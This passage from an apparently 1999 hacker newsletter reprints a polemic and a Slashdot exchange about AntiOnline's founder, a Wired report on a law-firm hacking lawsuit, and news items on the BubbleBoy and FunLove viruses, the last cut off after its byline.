It was an interesting time, to say the least. His site was one of the first of its kind to get investment capital and to go commercial, another note that the media was quick to pick up on. Once his site was back up and all his ducks were in a row, JP went back to doing what he did best—reporting on the things his friends did, mixing in news blurbs from time to time. Soon things started to change for JP and his site. After people (kids, really) started to see that they could get some much-desired attention (maybe their parents weren't giving them enough), they started to manufacture hacks specifically for AntiOnline and JP. It used to be that Web page hacks had some sort of reasoning behind them (most of the time), but soon they started to be more and more brainless. The hacks started being nothing more than a few cuss words and a friendly hello to JP and AntiOnline, in hopes of bettering their chances of getting a small story and making them famous for a few days. It was starting to become clear—JP was almost encouraging crimes so that he would have something to report on. The more stories JP had, the more hits he could maintain. The more hits he had, the more his sponsors would pump resources into AntiOnline. It was simple economics, supply and demand, and JP wasn't going to disappoint. At the rate JP was going, it didn't take long for other people to start to see through his façade and to see what he was really up to. It became clear that JP had started to put a glitz on stories, and was taking editorial liberties when reporting on them in order to sensationalize them. JP denies ever doing any such things, of course. A story that JP reported once comes to mind, one about a group of kids who had broken into the Defense Information Systems Agency and stole a "Top Secret" program that outlined networks for the military and the Pentagon. 
Reportedly, JP had gotten to see some of the information that came with this program and he said that, via his "sources" in the government, he was able to verify that this program was real. JP was on CBS News a few nights later, along with one of the 14-year-old kids (whose face was shadowed out) who said he had stolen it. It made headline news on television, on radio talk shows and in major papers around the US. And what a story it was. As usual, the government wouldn't comment on any of it, so it was hard to know what was the truth and what wasn't. After a few weeks had passed and the attention started to die down, an e-mail popped onto a public mailing list, a list where people were talking about JP and his site. The mail said that JP's report on the secret military program was a hoax. It outlined how anyone could go to the Web site of the company that made the programs the government used, and how anyone could download them for a free trial period. After it was proven that what this e-mail claimed was true, a minor uproar ensued within security and hacking circles across the Internet. People demanded that JP correct his stories and admit that what he printed was false. Instead, JP simply took the story out of his news archives and never spoke on the subject again. A clean sweep under the rug. A few months passed and the flames of the fire under JP and AntiOnline were roaring. Everyone was up in arms over his stories and reports. Several of his previous reports were being reviewed and some were being proven false. People wanted to know how could he get away with such a hoax. Some of his stories were true and others appeared to be totally made up. As reports started to surface, and as some people started to mark JP as a sham, he started to panic. He pulled out his trump card and started sending letters and e-mails to people around the Internet telling them to stop doing and saying whatever it was he didn't like, under the threat of legal action. 
People had set up parody Web sites, places like AntiOffline, Anti-AntiOnline and the Innerpulse News Network, so he sent some of them e-mail whining for them to stop making fun of him, or he would bring them to court. He even went as far as sending e-mail to a 15-year-old high school kid who wrote and Web-posted a paper with a fictional person in it named "PJ," because he thought it might be somehow poking fun at him. Yes, JP told him he would seek legal actions against him—or his parents, or whomever he could—if he didn't take down his story. He sent e-mails to people running sites like Attrition, to their Internet provider, and to their Internet provider's provider, complaining about how attrition.org kept an archive of all the errors he had made, and how they were pointing them out to people whenever they were asked to. As a matter of fact, he even sent me e-mail telling me he would take legal actions against me if I didn't leave him alone. Hell, I bet The Synthesis gets a threatening e-mail after this story runs. Adam Penenberg, a columnist and the senior editor at forbes.com, the Forbes Magazine online site, said in a recent article, "Of course, JP has nothing against good press. It's the bad press that lets him unsheathe his sharpest weapon. No, not the facts; those would only get in the way. We're talking about the threat of a lawsuit." The list of people he has threatened to sue is longer than Santa Claus' Christmas list. Only one minor detail JP seemed to forget—we, his detractors, are also protected by the First Amendment, entitled to our opinions. If he doesn't like them, he doesn't have to listen. After JP's suing spree ended, he turned himself into the laughing-stock of Internet security and hacking circles by changing his mission statement. He went from being a reporter and a self-proclaimed security expert to being a simple "security enthusiast" and the Net's "number one hacker-catcher."
He had, in effect, declared war on the underground because it hadn't accepted him as one of its own. "I have yet to see anything useful come out of AntiOnline or John Vranesevich; he has not contributed anything to the online community. Not one line of code, not one exploit, not one advisory has he issued. Most of the content on his Web site has been taken from elsewhere. He has done absolutely nothing, yet somehow maintains his status as some sort of information security God," says Space Rogue, who works with L0pht Heavy Industries (hacker collective on the forefront of the movement) and is the editor of the Hacker News Network. Mainstream media outlets stopped quoting JP, his sponsors started to withdraw their support, his hits were starting to drop, and according to one of his writers, he was finally operating in the red. "With his change in editorial viewpoint, however, along with his waning credibility among hackers, JP and AntiOnline became simply less useful to me as a source of knowledge or expertise. There are better sources for me to use to gain access to the hacking community, and there are better sources among the anti-hacker security community as well," says Michael Martinez, an Associate Producer at ABCnews.com, regarding JP's current stance on hacking. "This isn't a slam against JP or his site, because he's free to take his publication in any direction he likes and I wish him well. But for my purposes, the thing that made his site special—that bridge between hackers and security experts—is no longer there." Other long-standing security sites were starting to gain his traffic, and JP knew it. Packet Storm Security, one of the largest archives of free security tools and security-related topics on the Web, was becoming the main site on the 'Net for people interested in security. It had gigs and gigs of files and was updated every day, not to mention it was very anti-JP. 
Packet Storm had become so popular that its owner, Ken Williams, a graduate student at the University of North Carolina, couldn't afford to continue to operate it paying all the expenses out of his own pocket, so he asked for help. With the popularity of his site and how helpful he was to the Web community, an army lined up to offer him assistance—a line that included Harvard University, who offered to host his site on their systems for free. Ken jumped at the idea and spent the next month moving his site over, getting the system ready and putting in countless hours of upgrades for the grand re-opening. When it reopened, Packet Storm was getting hundreds of thousands of hits every day and was by far the biggest, most popular and most supported freeware security site on the Internet at that time, or for that matter, ever. What did JP do? In typical fashion, he bought a special computer program, or "bot" as they are called, which, when let loose on a Web site, basically rips off the entire site. He downloaded the Packet Storm info to AntiOnline for examination, and JP took what he wanted from it. During this raping of the Packet Storm site, the bot came across a private directory (not a publicly-visible directory). It had a picture of JP and his sister from their high school's online year book, as well as a collection of a few e-mails and Web sites Ken had been sent regarding JP (none of which were very favorable towards JP, but none of which I saw advocated violence or contained pornography). JP saw an opportunity and he ran with it. The next day, he contacted Harvard and told them Ken had a directory on his site containing "pornographic material," "degrading pictures" of him and his family, and contained "death threats" against the Vranesevich clan. He even went as far as to say he had hired a full-time security guard for his offices because he feared for his life, and that Harvard was going to have to pay the price if they didn't remove the site ASAP. 
Again in typical fashion, JP implied he was going to take legal actions against them. Harvard's reaction was knee-jerk: It had never been in a situation like this before, so the school sent someone to pull the plug on Packet Storm and dismantle the box. It was done so fast they didn't even talk to the administrators at Harvard who had direct control over the box, and didn't even notify Ken as to what was going on. Again, an online riot ensued. Wired and Zdnet ran stories on what had happened, and security circles and hackers alike were in an uproar, wanting JP's proverbial head on a digital platter. Because the site was part of Ken's Master's degree project and his access to it was totally cut off for weeks, he had to drop out of school or risk taking failing marks. There were rumors that Harvard might try to sue him, and JP as well. Soon the tide started to turn, the truth came out and JP found himself taking the brunt of the 'Net community's wrath. Ken was a popular person and his site was totally free, while JP was despised by many and his site was commercial. At DefCon '99 (DefCon is an annual hacker convention held in Las Vegas), there were "Wanted" posters all over the hotel. They featured a picture of JP, called him a narc and gave information about some of the stuff he is alleged to have done. There were so many sites on the 'Net going after JP, it was difficult to keep track of them all, and the number of attacks against AntiOnline soared so high that the site's Internet Provider, StarGate.net, had to pull the plug on his site several times to avoid crashing their entire network. All this wasn't totally bad, though. Ken Williams was eventually offered a high-paying security job and his site was bought for a reported (not confirmed) $125,000 by the security firm Kroll-O'Gara, and put back online a month later. 
According to Carolyn Meinel, a staunch JP supporter, writer, consultant and far from a favorite in hacker circles herself, "John Vranesevich showed courage and compassion for his kid sister when he complained to Harvard that Ken Williams' Packet Storm Web site carried her photo, home address and incitements to harm her. Vranesevich could have just sat on his rear end and waited for the police to go after Ken. Instead, he got the threatening material removed forever from the Web, Williams got paid a ton of money for the technical portion of Packet Storm, and now the loud mouths of the computer security industry say Vranesevich was the bad guy." Despite these kind words from his friend, JP is still on the outs with most of the security world and hackers alike. As of this day, if you were to visit AntiOnline, it would almost read like you were on the Web site of an extremist group. JP comes across like he is against anything and everyone whose views do not match his, and he is apparently very bitter because of the nonstop attacks against him. In a recent story posted on his site, (http://www.antionline.com/cgi-bin/features/News_Spoof?date=10-06-1999) he joked about how some of his critics at Attrition had joined forces with pedophiles. After being accused of this, Brian Martin, the founder of Attrition and a security professional said, "It is truly unfortunate that a single person is duped by Vranesevich and AntiOnline. Their history of libel and slander, inaccurate and biased 'journalism,' sparse news updates and other unprofessional behavior represents the baseline of negativity and unethical actions." How low can someone go when they say their critics rape children? Why does he do it? It's simple—he wants the attention. There is an old saying, "bad press is still press," and at this point, JP is itching for any press he can get to drive up his hits, even if it means pissing off everyone on the Internet in the process. 
"I am constantly amazed at how John Vranesevich pisses off large numbers of people seemingly on purpose. From my point of view, it seems as though he purposely stirs up controversy to draw attention to his site and himself," says L0pht Heavy Industries' Space Rogue. "We're thinking about making JP honorary director in charge of global marketing [for Packet Storm Security]," says Matt Barrie, the current director of Packet Storm Security for Kroll-O'Gara, in a blatantly sarcastic, humorous tone. "He created the opportunity for us to obtain it, creating so much hype in the process that we now get more hits to the site than Ken ever did, plus he links to us from AntiOnline. We love the guy! The more he says, the more we benefit! Keep up the good work!" At this point, JP will probably be glad this article came out just because it's more time his name will spend in the print. The JP story continues on to this day. People are still criticizing him, attempting to prove him as a fake, while he still goes on writing stories and continuing to "work with the FBI catching evil hackers across the country," as he boasts. Well, that last part is still a matter of debate. When I contacted the FBI's public relations department and submitted my questions regarding JP and AntiOnline, they said they do not comment on any ongoing case, anyone they might have under investigation, or anyone who might be working with them anonymously supplying tips. They did note, however, that they had no records of any contract with anyone named John Vranesevich or a company called AntiOnline. I guess this means he could be supplying tips to the FBI, anonymously or otherwise, but anyone can do that via a 1-800 number. Besides, does that constitute a working relationship with the FBI? 
I think Ken Williams, founder of Packet Storm Security who now works professionally in the security world, put it best: "The fact that the FBI 'consults' with JP does not in any way validate the work of a technologically-inept jackass who thrives on intimidation. It does, nevertheless, illustrate why the FBI should now give Special Agent badges to JP, Elvis and maybe even the Easter Bunny."

Bronc Buster is an established California-based hacker who was featured in SPIN Magazine's November, 1999 issue. He can be reached via e-mail at bronc@2600.com.

Web sites and articles mentioned in this story, as well as places to find out more information about this subject:

Was it a library or a high school JP set the lab up in? Who did what at Pitt? How did JP first get his site up? What did he tell the NY Times? See for yourself through the links below:

http://www.wired.com/news/news/culture/story/8685.html
http://www.wired.com/news/news/culture/story/9116.html
http://www.nytimes.com/library/tech/99/10/cyber/articles/08hackers.html

Attrition joins forces with Pedophiles?
http://www.antionline.com/cgi-bin/features/News_Spoof?date=10-06-1999

Forbes Story on JP:
http://www.forbes.com/columnists/penenberg/1999/0927.htm

Cyber Wire Dispatch Story (mirror thanks to HNN):
http://www.hackernews.com/orig/CWD0899.html

Attrition archives of JP's errors:
http://www.Attrition.Org/negation

Other sites of interest in regards to this article:

http://www.antionline.com – AntiOnline
http://www.attrition.org – Attrition web site
http://packetstorm.securify.com – Packet Storm Security
http://www.slashdot.org – Slash Dot News
http://www.hackernews.com – Hacker News Network
http://www.happyhacker.org – Carolyn Meinel’s Happy Hacker web site
http://www.2600.com – 2600 Magazine
http://www.innerpulse.com – Inner Pulse News
http://www.defcon.org – DefCon Convention Web Site
http://www.l0pht.com – L0pht Heavy Industries

The non-interview;
Posted by Roblimo on Friday November 12, @11:22AM
from the bobbing-and-weaving-and-ducking dept.

Monday, when we asked you to Grill John Vranesevich, we got mostly flames (as expected), but somehow we managed to extract 12 hard-nosed questions from the ashes. Sadly, Mr. Vranesevich chose not to respond to them directly, but sent an argumentative screed instead. Below you'll find the questions we sent, followed by Mr. Vranesevich's essay in its entirety (including his original HTML formatting), along with a link to a Forbes story that is, um, not exactly complimentary to him.

Question #1 by manitee
Having read many accounts of your interactions with the staff of attrition.org, it seems to me that your claims against them are generally unproven and rash. Their rebuttals are always filled with detailed fact and systematic, step by step analysis of the topic at hand.
Please clarify why you feel that attrition.org is such a dangerous force, yet you have never been able to present HARD EVIDENCE to that point.

Question #2 by davidu
Many of us in the hacker community (not cracker) used the Packet Storm security site for information and research. You had it shut down for some alleged things in the /jp directory. Explain to us why you called [Harvard] to shut it down rather than dealing with the maintainer. What did you accomplish by threatening to sue other than further harm your image and remove any credibility you had?

Question #3 by Kintanon
What is the basis for your attacks on security Experts such as Attrition.org? To Clarify the question: Why do you proclaim them to be 'dangerous hackers' while they do essentially the same thing you claim to do, except that they do so better, faster, and more professionally?

Question #4 by mattc
Why did you deliberately block links from Slashdot, HNN, and any other site who criticized you during the closure of Packetstorm?

#5 by WH
How do you respond to allegations that the FBI is investigating your knowledge of attacks before they happened and the accusations by some hackers who performed said attacks that you paid them or otherwise coerced them to do it in order to have coverage for your website?

#6 also by WH
Why do you feel that sites containing satirical humor based [on] antionline are not protected by law and therefore open to your threats of legal action?

#7 by Hard_Code
Are the rumors that you will be spinning off a sister site called Anti-Anti-Anti-Online to dispel the malicious accusations and deprecations of your obviously magnanimous professionalism and intellect and to further bolster the image of Anti-Online and your integrity as a computer- security- expert- guru- enthusiast, true?

#8 - #11 by Jeff - (Heavily edited - RM)
I have several questions which I will ask within the narrative below.
The narrative is important to understand the context of the questions, and to support my arguments. Several months ago I was raided by FBI for supposed involvement with the "hacker" group gh. The extent of my involvement was participating, as a caller only, in illegally funded phone conferences. JP, who also participated in these conferences, labeled me as a hacker, and a member of gh on his "news" site. Neither of these accusations are true. He has many more ties to this and other hacker groups than I have ever had....

#8 - How can you pretend to be taking a stand against "hackers" while you are involved in the same activities?

#9 - My third question is in regards to your coverage of the situation. You posted unconfirmed information from an unreliable source in regards to the status of my employment at a prominent software development company. As a result of this I was contacted by several news agencies, and immediately stereotyped as a hacker even though I have never illegally penetrated any computer system, nor had I been charged with, or accused of any crimes by the FBI. In response to this I granted one news agency an interview, which I thought went well, but also backfired. As a result of the negative press my former employer could not even consider allowing me to stay. My question being, Do you expect people to consider you as a reliable news source even though you report data which you receive through unreliable channels?

#10 - Did you ever stop to think what the impact of your coverage might be? It seems to me that in your rush for the big story you have failed to check for the correctness in your articles, and as a result of this you are hurting innocent people, such as myself. I'm sure this has gone on in other cases, but mine is the only one I have enough knowledge to comment on. I don't attribute these unfortunate events to you, but you certainly did not follow good news practices in reporting them.
You have only served to injure my credibility and your own.

#11 - Lastly, have you ever considered what legal action may be taken against you for your involvement with these criminals? Do you even recognize the hypocrisy of your stance on hackers being one yourself by your own definition?

Question #12 by sonoffreak
Why did you decide to let Slashdot interview you? How did the response you got compare to what you expected?

John Vranesevich's Response:

Greetings All

Well, I've seen many people say that I can't take criticism. Believe me, if that were true, I surely never would have opened myself up to a SlashDot inquisition. I knew before I even agreed to the interview, that things would be ugly. Needless to say, I was right on the money. However, I will say this. I was very disappointed in the downright lack of maturity that many of the posts showed. I like to believe that most people who frequent this type of forum are of an intellectual nature. I found it very disheartening to hear nearly every rumor ever voiced about myself or my company being regurgitated as if they were all fact. An educated bunch of people should understand that not everything that they hear is true at all, and that almost nothing that they hear is totally accurate. But, some of that could be my fault. Many posts pointed out the fact that I have never "given explanations of" or provided "blow-by-blow responses" to any of the things that have been written about me. This is true. If I spent my life defending myself from every individual who had a nasty thing to say about me, my life would end up pretty meaningless in the end. I think that's true for most people. I decided a long time ago that I wouldn't allow myself or my website to become dedicated to those who would seek to bring me down. I have a lot of goals in my life, and I'm not about to let nonsense get in their way. But, nevertheless, I saw this SlashDot invitation as the perfect opportunity to talk about some of those very issues.
It's not that I feel that people who posted negative comments will read what I have to say, and then decide that they were totally wrong about me. Those who despise me for whatever reason will continue to do so no matter what I ever say or do. Even SlashDot faced the wrath of dozens of people who are "no longer going to visit this site" for one reason or another after reading the interview bio on Monday. So much for loyalty in this day and age I suppose.

Yours In CyberSpace,
John Vranesevich
Founder, AntiOnline

Now, On To The Questions

I received a list of "questions" from Robin earlier this week, and to put it bluntly, they were just stupid. I'm not going to waste my time writing up ridiculous answers to ridiculous questions that no one really cares about. For example, here is one of the questions posed to me "Are the rumors that you will be spinning off a sister site called Anti-Anti-Anti-Online to dispel the malicious accusations and deprecations of your obviously magnanimous professionalism and intellect and to further bolster the image of Anti-Online and your integrity as a computer-security-expert-guru-enthusiast, true?" Now how stupid is that? What would my answer be, something like "Um, no". Not a very stimulating Q&A if you ask me. So, instead of wasting my time and yours, I decided that I'd simply cut to the chase, and answer what appear to be some of the major allegations, accusations, and other such tidbits that some people seem obsessed over.

AntiOnline & PacketStorm

First off, let me say that I didn't shut down PacketStorm, and neither did Harvard. Ken Williams is the sole person responsible for that site being shut down. He chose to take a popular forum which was designed to disseminate information related to computer security, and abuse his own creation in order to harass someone. Sure, post satire about myself or my website. I truly don't care, and in many cases, I have even promoted such websites on AntiOnline.
One such satire site that I've linked to several times is "AntiOffline.com". Personally, I consider satire as one of the greatest types of compliments one can get. However, what Ken did far surpassed simple satire. By posting a photo of my younger sister (who was a minor at the time), along with her full name and address, he successfully started a mass campaign of harassment against her and my family. This I wouldn't tolerate. I don't care how popular of a site it was, or how valuable of a resource it was. It was abused by Ken Williams for his own perverse sense of amusement, at the cost of my family. As for all of this "threaten to sue" hype which soon followed. I never did any such thing. I'm not sure which University Official ever told Ken Williams that, if any, but he was certainly mistaken. I sent a simple one page e-mail to the provost's office asking them to review the contents of the site against their acceptable use policy. Despite Ken's claims that there wasn't any "offending" material on the site, the university reviewed it, and chose to shut it down. A major and prestigious university like Harvard wouldn't simply shut down a site because some pissant like myself sent them an e-mail, unless there was a very good reason to do so. Use your common sense people. However, what Ken Williams did was a very successful campaign of pity afterwards. I will admit that. "A poor college student whose website was shut down by an evil corporation called AntiOnline. Whose college career has been ruined, and all of his hard work lost". Truth of the matter is that Ken is in his 30s, and isn't some naive little college freshman. He got his site shut-down by harassing a 17 year old girl, which shortly after being shutdown, Ken sold for a reported $125,000 to Kroll. Poor Ken.

AntiOnline & Attrition

This is even more stupid than Ken Williams.
Despite all of the crap, and there really isn't a better word for it, which has poured out of Brian Martin and his Attrition.org site, I think I can sum up events in one small paragraph:

AntiOnline was asked by the FBI to help investigate a group called "HFG" which broke into the New York Times' Website. AntiOnline does some digging, and turns over its findings. Shortly thereafter, Brian Martin, founder of Attrition.org, and someone that no one at AntiOnline had ever had any contact with before, was raided by the FBI. Ever since then, for some strange reason, Brian Martin has attempted to do anything and everything he can to discredit myself and AntiOnline. Wonder why? Is it because I'm an evil menace to society that threatens the very existence of the internet and all that is good? I would submit to you that Brian Martin's motivations are far more geared towards protecting his own ass, than they are geared towards protecting society's ass. Once again, use your common sense.

What exactly does AntiOnline Do?

That's something I see asked a lot on "underground" type webpages. To be frank, we're not a public company, and it really isn't anybody's business except those that we work with. I can, however, tell you this. The fact that nearly every malicious hacker (or cracker if you prefer the term) dislikes AntiOnline is actually good for us, and is the exact position I want to be in. Some people even "joke" that I intentionally try to "piss off large groups of people at a time". Well, it's not just a joke, it's the truth. I think I'm pretty good at doing it too. We average between 200-500 intrusion attempts against one of our systems AN HOUR, and every time I piss another segment of the cyber-population off, that number skyrockets. We probably have one of the most targeted networks on the internet today, and we take full advantage of that. Do you think that we let the type of data that we're able to collect and log just go to waste?
I don't ;-)

Is AntiOnline Being Investigated By The FBI?

To tell you the truth, I doubt it, but I don't know for sure. But, there's a reason why I don't know for sure. The FBI doesn't talk to anyone about who they are/have investigated. Anyone that has ever worked with the FBI in any manner, can tell you that they, as a rule, keep quiet in order to protect any investigation. If they were to deny reports about us being investigated, that would confirm in the minds of others that they are being investigated, when the FBI comes up with a "no comment" answer. Make sense? Here's where things get funny. The person that "blew the lid off of the story" that AntiOnline was being investigated by the FBI is none other than, you guessed it, Brian Martin of Attrition. He told a reporter that an FBI agent "informed him" about the active investigation. Common sense time. Would the FBI raid someone (like Brian Martin was), and then shortly thereafter begin telling that person about all of the other investigations that they are doing so that they could spread the word all over the Internet and ruin their case? Personally, I would highly doubt that the FBI would consult with us if they suspected, or were investigating the possibility, that AntiOnline was some evil criminal empire that paid people off to break into high profile websites so that we could post an interview. Get real people.

Does it bother you that everyone hates you. Why or why not?

This is something that I actually saw posted on the message board. To be honest, at this point in my life, my goal is not to become loved in the hearts of the masses. I'm not running for political office, so popularity doesn't count. I have goals in my life that I want to achieve. Some of these goals are short-term, some of them are long-term. Right now, at the age of 21 (as of October), I'm exactly where I want to be.
My professional career is on track, financially I'm in good shape, my personal life is where I want it to be, and I can say that every day brings me closer to the goals that I have set for myself. Who could ask for more? Sure, I have to put up with a lot more flack and B.S. than the average 21 year old. But I'll tell you this, every minute is worth it.

To learn more about John Vranesevich as he was seen through the eyes of at least one reporter for a respected news outlet, read this Forbes article. - RM

@HWA

42.0 Strange Corporate Hacking Saga
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.wired.com/news/print/0,1294,32488,00.html

by Craig Bicknell
3:00 a.m. 12.Nov.1999 PST

Judge Thomas Penfield Jackson may have a head full of Microsoft hoo-ha. But he's going to have to make some room for another case. No lofty antitrust issues here. This one's a weird little cyber-drama starring a personal data-sales Web site called Dig Dirt, its cybersquatting owner, and a prestigious law firm that allegedly hacked into Dig Dirt's digs. Michael Moore, owner of DigDirt.com's parent, Moore Publishing, this week filed suit in US District Court for the District of Columbia accusing the august Washington law firm of Steptoe & Johnson of launching a "cyber war" against Moore Publishing and Dig Dirt. He's demanding US$10 million in damages, and the case has landed in Jackson's court. Moore charges that, among other things, Steptoe employees cracked into Dig Dirt and other Moore Publishing sites some 750 times, posted defamatory messages about Moore on Usenet, and tried to cover it all up by doing their evil deeds under an e-identity swiped from an Alexandria, Virginia, furniture store owner. Steptoe declined comment beyond this terse statement: "Steptoe & Johnson LLP denies the allegations against it. Unlike Moore Publishing Company Inc. and its counsel, Steptoe & Johnson LLP will not litigate this case in the media. We will respond in the Court where these matters are properly addressed."
No such reservations for Moore's attorney, solo practitioner Rodney Sweetland, who happily offered up his version of the story. On 4 August, according to Sweetland, somebody from Steptoe cracked into Dig Dirt, a site that fronts an enormous database of personal data gleaned from public records. Dig Dirt sells the data to private investigators, lawyers, and law enforcement agencies. The supposed Steptoe hacker did no damage, but left obvious electronic tracks back to Steptoe's servers. The hacker didn't actually break in through digdirt.com, however. He broke in through an alternate URL, CDBInfo.com. The URL bears a striking resemblance to the name CDB Infotek, a data-selling competitor to Dig Dirt. In fact, CDB Infotek is the data-selling competitor that Steptoe & Johnson uses when it needs background dirt on somebody. Why the heck does CDBInfo.com lead to Dig Dirt's site? Well, there's this matter of Moore Publishing's apparent side business -- cybersquatting. Moore owns dozens of URLs, including campaign-related domains like "Whitmanforsenate.com," names of other database competitors, and even the names of some prominent law firms, including SteptoeJohnson.com. Sweetland wouldn't confirm that his client's domains were for sale. To continue. After the initial "crack," Sweetland contacted Steptoe & Johnson and demanded an explanation. Steptoe denied all guilt. In early September, Moore Publishing filed suit in Jackson's court, demanding Steptoe pony up $800,000 to pay for its supposed misdeeds. Steptoe refused the proposed settlement and filed a motion to dismiss the case, countering that there had been no hack. The law firm said one of its employees "did the Internet equivalent of knocking on the wrong door," accidentally ending up at Dig Dirt when he'd been headed for CDB Infotek. Moore's suit, claimed Steptoe, was "yet another way of making money from the pernicious activity of cyber-squatting." 
Meanwhile, according to the expanded Moore suit filed this week, a whole new wave of Steptoe-led computer attacks was already under way. The attacks began shortly after Sweetland contacted Steptoe about the first "attack" in early August, the suit charges. Steptoe tapped one of its computer systems employees, Thomas Felt, to investigate Moore Publishing's claims. Moore Publishing sites were subsequently hit by a wave of denial-of-service attacks, apparently designed to overwhelm Moore's servers. Moore determined the attacks were originating in the servers of a Virginia Net hosting company. Sweetland subpoenaed the hosting company's records, which revealed the precise origin of the assault: the account of one Lois Gloor, a furniture store owner in Alexandria. Sweetland called Gloor. She had no clue what he was talking about, he said. But she did say a part-time consultant had recently helped set up all her computer systems. The consultant's name: Thomas Felt. According to Sweetland, Felt swiped Gloor's passwords and account info, using them first to launch numerous assaults against Moore Publishing in early September, then to post defamatory messages about Moore on Usenet. One such post read, in part: "I guess business must be bad ... now they are trying to shake down law firms ... ask Michael why he has filed a sham lawsuit against Steptoe.... I guess he needs the money. Just thought everyone should know what kind of people these guys are ... the lowest of the low, and now they are turning to computer crime." As a result of the supposed identity heist and the Usenet posts, Moore Publishing has expanded its case to include charges of computer fraud and defamation. Was the supposed assault on Dig Dirt ordered from on high within Steptoe? Sweetland said he doesn't think so. "It looks to me like a bunch of cowboys in the computer department went off the reservation," he said. That doesn't absolve Steptoe of responsibility, said Sweetland. 
And if someone in the firm was upset by Moore's first suit or his client's apparently self-interested ownership of the SteptoeJohnson.com domain, they chose a poor way to show it. "To the extent that Steptoe Johnson had any contention with [Moore's] use of the [SteptoeJohnson.com] domain, there are legitimate avenues of redress," he said. "They could have gone to NSI, but they didn't. What you can't do is hack, defame, and use denial-of-service attacks, and that's what happened."

Steptoe undoubtedly will offer up a different version of events, and it'll be up to Judge Jackson to decide what's what. After his experiences with the Microsoft trial, Jackson should have a good grasp of the terrain. "He's probably one of the most computer-savvy judges out there, by necessity," said Sweetland.

@HWA

43.0 BubbleBoy Breaks Out of Lab - Found on Net
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Scores

The most recent media darling virus, BubbleBoy, has now been found in the wild. A Japanese web site devoted to collecting viruses has posted BubbleBoy for all to download. It was previously thought that BubbleBoy existed only in the lab. BubbleBoy only affects users on the English and Spanish versions of Microsoft Outlook.

MSNBC
http://www.msnbc.com/news/333265.asp

BubbleBoy virus found on Net

Web page devoted to collecting viruses has a copy; First-of-its-kind program infects users just reading e-mail

By Bob Sullivan
MSNBC

Nov. 11 — The BubbleBoy virus, which sent shudders through the antivirus community earlier this week, is no longer just a lab rat. MSNBC has confirmed that the virus — and an updated version 1.1 of the program — has now been posted on a Web page hosted in Japan devoted to collecting viruses. A look at the virus reveals a few more details about the program.

WHILE THE VIRUS is now available for download and imitation by virus writers, there as yet have been no reported victims of the program.
A text document connected to the virus claims the nefarious program was written by a virus writer named “Zulu” and suggests the program originated in Argentina. That text file also goes on to credit the security expert who first discovered the vulnerability exploited by the virus: “First e-mail worm (without using attachments),” according to BubbleBoy.txt. “It uses a vulnerability discovered by Georgi Guninski in which many versions of Internet Explorer 5 allow any HTML file or e-mail to write files without ActiveX authorization.” It also notes the virus will only work in English and Spanish versions of Microsoft Outlook.

The long-feared new breed of computer virus emerged late Monday, according to antivirus firms. The so-called BubbleBoy virus can infect Internet users when they open, or even simply preview, an infected e-mail.

“Historically we’ve always said, as long as you don’t open attachments, you’re safe,” Network Associates spokesman Sal Viveros said. “That’s not true any more.”

It was apparently created by a fan of the U.S. TV sitcom “Seinfeld.” The name appears to have been taken from an episode of the show. Another famous character, the Soup Nazi, is referenced in the virus’ code itself, as is Vandelay — an apparent reference to Vandelay Industries, a fictitious company where hapless George Costanza claimed he was employed.

The virus arrives with the subject line “Bubbleboy is Back!” The body of the message includes the text “The BubbleBoy incident, pictures and sounds.” There’s also a link to a non-working Web page — http://www.towns.com/dorms/tom/bblboy.htm.

Bubbleboy is a “proof of concept” virus that has no dangerous payload, meaning it doesn’t attempt to delete or alter files. But it does have the ability to create a “Melissa-like” mail storm as it sends copies of itself to every e-mail address in the victim’s address book.
For over a year, security experts have raised the concern that e-mail itself — rather than an e-mail attachment — can transmit a computer virus. The problems are caused by e-mail readers that render HTML, like Microsoft’s Outlook or Eudora Pro. Since these programs allow Web-page-like formatting within the body of the message, they also allow execution of code. With Outlook Express, that code can be executed even before the message is open, thanks to the “preview pane” included with the software. (Microsoft is a partner in MSNBC.) But while the possibility has existed theoretically, BubbleBoy is the first virus to exploit it, Viveros said. Thanks to virus crises like Melissa, most Internet users seem used to the idea that opening e-mail attachments can expose their computers — but reading e-mail itself has always seemed safe. Not any more, according to Viveros. “This really changes the way people need to react to viruses,” he said. “You can’t really tell people, ‘Don’t open e-mail.” In fact, it’s unclear exactly how users of HTML-enabled e-mail readers can protect themselves from such viruses. Regularly updating antivirus software will filter out most viruses, but virus writers are usually a half-step ahead of antivirus software — new ill-intentioned programs are almost always able to slip through defenses during the first few hours after their release. “Until yesterday, I was telling people, ‘Don’t open attachments unless you know why the person sent it to you,’ ” said Dan Schraeder, vice president of new technologies at antivirus firm Trend Micro. “Now I get nervous just opening e-mail.” BubbleBoy was sent anonymously to Network Associates Monday night, Viveros said, probably by the author. At that time, it was declared just a lab rat — no antivirus firm had reported seeing BubbleBoy in the wild. “This virus has not been posted at any hack site we are aware of. We don’t expect to see variants of it popping up all of the sudden,” Schraeder said Tuesday. 
But that’s no reason to dismiss it. “Historically, what we’ve seen is people take proof-of-concept viruses and create dangerous payloads for them,” Viveros said.

HOW THE VIRUS WORKS

The virus only affects Microsoft Outlook users with Internet Explorer 5.0, and only if Windows Scripting Host is installed (standard in Windows 98 and Windows 2000 installations). If security settings for Internet Zone in IE5 are set to High, the worm will not be executed. It does not run on Windows NT.

According to Schraeder, the virus actually takes advantage of a security flaw in Microsoft’s ActiveX technology that was discovered in August. Two components of Internet Explorer 4.0 and 5.0, scriptlet.typelib and Eyedog, are incorrectly labeled as “trusted” — meaning they can retrieve and alter critical information on a user’s computer. BubbleBoy calls on these controls through scripting in the body of an e-mail message in order to access a victim’s computer.

Users who have installed Microsoft’s patch for the flaw (available from this Web site) are not vulnerable to BubbleBoy, but they may be vulnerable to other HTML/e-mail attacks.

“This is a good wake-up call for us, to remind people they need to get the latest security updates and update their virus scanning engine,” Schraeder said.

@HWA

44.0 'Fun Love' Warning Issued
     ~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by nvirb

A virus known as FunLove appears as an executable file and has already infected a large European company. When an administrator logs onto an infected Windows NT system, the virus grants administrator rights to all users. Descriptions for the virus have been added to Anti-Virus companies' definition files.

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,1018115,00.html?chkpt=zdnntop

--------------------------------------------------------------
This story was printed from ZDNN, located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Researchers warn about 'FunLove' virus

By Jim Kerstetter, PC Week
November 11, 1999 1:40 PM PT
